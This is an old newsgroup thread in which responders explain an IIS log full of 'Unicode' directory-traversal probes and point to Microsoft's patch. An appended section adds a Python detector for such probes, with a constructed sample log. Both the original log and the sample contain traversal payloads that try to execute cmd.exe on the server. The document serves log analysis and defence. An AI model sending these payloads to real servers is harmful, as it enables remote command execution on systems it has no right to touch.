-
Site Break IN
Below is the log file from someone trying to break in. What are they trying
to do?
Thanks for any help.
Savage
2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:20:13 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:20:29 24.19.216.36 - 65.114.73.230 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:21:28 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir 404 -
-
Re: Site Break IN
Execute arbitrary commands on your system. This is a known exploit for IIS.
-Matt
"Savage" <vondras@enteract.com> wrote in message
news:3b34f65c$1@news.devx.com...
-
Re: Site Break IN
It's the Unicode 'sploit.
"Savage" <vondras@enteract.com> wrote:
-
Re: Site Break IN
No, it's UTF-8.
Eli Allen
"Michael Howard" <mikehow@microsoft.com> wrote in message
news:3b3a5749$1@news.devx.com...
>
> it's the unicode 'sploit.
-
Re: Site Break IN
This person obviously has read about the Unicode exploit in IIS 4.0 and 5.0
and is trying it out on your web server. Only thing is, the exploit has many
possible forms owing to the different Unicode tables available. Looks like
he/she is trying them out one by one, trying to see which one(s) work.
Go get the patch from Microsoft.
If you cannot find it, let me know :-)
"Savage" <vondras@enteract.com> wrote:
-
Re: Site Break IN
The guy is just trying to see if there are any security holes in the web server.
If he successfully manages to execute cmd.exe, he knows that there is a hole.
"Savage" <vondras@enteract.com> wrote:
-
Re: Site Break IN
Looks like they are trying to get to your IIS server and find out whether
the remote cmd invocation bug has been fixed on your server or not.
"Savage" <vondras@enteract.com> wrote:
-
Re: Site Break IN
Here is some information on the logs:
Date of attack : 06/21/2001 (mm/dd/yyyy)
Time of Attack : 10:18PM
Source Of Attack : 24.19.216.36
Destination Address Of Attack : 65.114.73.230
Destination Port Of Attack : 80
Attack Name : Microsoft IIS 5.0/4.0 UNICODE Vulnerability
Attack Description : The reported attack uses a vulnerability in Microsoft IIS to traverse directories outside of the webroot; this allows an attacker to gain anonymous access to the system running the webserver.
Advisory Number (MICROSOFT) : Q269862
Date of Advisory : 08/26/2000 (mm/dd/yyyy)
Hope this helps just a little.
------o1o
"Savage" <vondras@enteract.com> wrote:
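Two of the replies above make the practical points: the probe "has many possible forms" and the scanner "is trying them out one by one", and the o1o summary names it as the IIS directory-traversal (Q269862) issue. The following is an added example, not code from any of the posters, that shows what those forms actually decode to and how to pick them out of an IIS W3C log. Note how the stems in Savage's log appear to have been percent-decoded before logging: Á and À are bytes C1 and C0 rendered in Windows-1252, and the ð€€¯ on the last line is F0 80 80 AF, the overlong four-byte encoding of '/'. The sample log below is constructed to mirror those entries but written in the raw percent-encoded form the client sent; the decoder is a simplified model (an assumption, not the IIS source) of the canonicalisation mistake, accepting overlong sequences and not validating continuation bytes, which is what turns %c0%af into '/' and %c1%1c into '\'. It goes a little beyond the thread in handling the three- and four-byte overlong forms as well as the two-byte ones.

```python
"""Flag IIS 'Unicode' (overlong UTF-8) traversal probes in W3C extended log lines.

Added example for this thread, not code from the original posts. SAMPLE_LOG is
constructed; the decoder is a simplified model of the vulnerable behaviour
(assumption), not a reproduction of the IIS code.
"""
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# Constructed sample; field order as in the thread:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status -
SAMPLE_LOG = """\
2001-06-21 22:18:32 24.19.216.36 - 65.114.73.230 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..%c1%pc../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:20:17 24.19.216.36 - 65.114.73.230 80 GET /scripts/..%c0%9v../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:21:24 24.19.216.36 - 65.114.73.230 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:21:36 24.19.216.36 - 65.114.73.230 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:21:41 24.19.216.36 - 65.114.73.230 80 GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe /c+dir 404 -
2001-06-21 22:22:03 10.0.0.5 - 65.114.73.230 80 GET /default.htm - 200 -
2001-06-21 22:22:09 10.0.0.5 - 65.114.73.230 80 GET /scripts/report.asp id=3 200 -
"""

# '..' glued directly to a percent-escape: an encoded separator is being smuggled in,
# whether or not the escape is valid hex (the %pc / %9v forms are not).
ENCODED_DOTDOT = re.compile(r"\.\.%")


def sloppy_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 permissively: overlong forms accepted, continuation bytes unchecked.

    Simplified model of the flaw (assumption). A strict decoder such as
    bytes.decode('utf-8') rejects every sequence this one lets through.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:                        # plain ASCII
            out.append(chr(b))
            i += 1
            continue
        if 0xC0 <= b <= 0xDF:               # 2-byte lead; C0/C1 can only be overlong
            need, cp = 1, b & 0x1F
        elif 0xE0 <= b <= 0xEF:             # 3-byte lead
            need, cp = 2, b & 0x0F
        elif 0xF0 <= b <= 0xF7:             # 4-byte lead
            need, cp = 3, b & 0x07
        else:                               # stray continuation byte or longer lead
            out.append("\ufffd")
            i += 1
            continue
        tail = data[i + 1:i + 1 + need]
        if len(tail) < need:                # truncated sequence
            out.append("\ufffd")
            i += 1
            continue
        for c in tail:                      # no 10xxxxxx check: C1 1C therefore yields 0x5C '\'
            cp = (cp << 6) | (c & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + need
    return "".join(out)


def strict_utf8_ok(stem: str) -> bool:
    """True if the percent-decoded stem is valid UTF-8, i.e. what a correct decoder accepts."""
    try:
        unquote_to_bytes(stem).decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def escapes_root(path: str) -> bool:
    """Walk a decoded path segment by segment; True if a '..' climbs above the virtual root."""
    depth = 0
    for seg in re.split(r"[/\\]", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def analyze(line: str) -> Optional[dict]:
    """Return a finding for one W3C log line, or None if it looks benign."""
    f = line.split()
    if len(f) < 10:
        return None
    stem, query, status = f[7], f[8], f[9]
    decoded = sloppy_utf8_decode(unquote_to_bytes(stem))
    reasons = []
    if ENCODED_DOTDOT.search(stem):
        reasons.append("encoded-dotdot")    # traversal attempt, decodable or not
    if escapes_root(decoded):
        reasons.append("escapes-webroot")   # the variants a sloppy decoder would honour
    if "cmd.exe" in decoded.lower():
        reasons.append("cmd.exe")           # command-execution target
    if not reasons:
        return None
    return {"time": f"{f[0]} {f[1]}", "src": f[2], "stem": stem, "query": query,
            "status": status, "decoded": decoded,
            "strict_utf8_ok": strict_utf8_ok(stem), "reasons": reasons}


def scan(log: str) -> list:
    """All findings for a multi-line log, in log order."""
    return [hit for hit in map(analyze, log.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['src']} {hit['status']} {hit['stem']}")
        print(f"    decoded as {hit['decoded']!r}  reasons={hit['reasons']}")
```

Run against the sample, the hex-valid forms (%c1%1c, %c0%af, %f0%80%80%af) decode to a path that leaves /scripts and are tagged escapes-webroot, while %c1%pc and %c0%9v never decode to a separator and show up only as encoded-dotdot noise from the scanner's list; every one of them fails strict_utf8_ok, which is the check a fixed decoder performs. A 404 on every probe, as in Savage's log, means nothing reached cmd.exe; an escapes-webroot hit with a 200 status and a /c+dir query is the line to treat as a successful command execution rather than a scan.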